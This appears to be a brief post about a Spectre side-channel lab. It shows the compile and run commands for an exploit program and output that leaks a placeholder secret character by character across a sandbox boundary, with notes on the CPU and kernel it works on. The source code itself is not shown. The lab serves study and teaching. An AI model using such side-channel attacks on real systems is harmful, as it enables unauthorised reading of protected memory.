I took a deep dive reading about this vulnerability and ended up discovering a great lab describing the exploit. This demo shows how even in a sandboxed environment, an intraprocess memory read outside of the sandbox is possible. This attack was tuned for an Intel Haswell CPU on a 5.15.59 kernel.

Update: This style attack was totally ineffective against an AMD Ryzen 5700 on a 5.15.80 kernel.

gcc -march=native -o SpectreAttack SpectreAttack.c

./SpectreAttack

Secret: Some Secret Value

Possibilites for Char 0
'S'
Possibilites for Char 1
'o'
Possibilites for Char 2
'm'
Possibilites for Char 3
'e'
Possibilites for Char 4
' '
Possibilites for Char 5
'S'
Possibilites for Char 6
'e'
Possibilites for Char 7
'c'
Possibilites for Char 8
'r'
Possibilites for Char 9
'e'
Possibilites for Char 10
't'
Possibilites for Char 11
' '
Possibilites for Char 12
'V'
Possibilites for Char 13
'a'
Possibilites for Char 14
'l'
Possibilites for Char 15
'u'
Possibilites for Char 16
'e'

*Provides best results after 3 consecutive runs.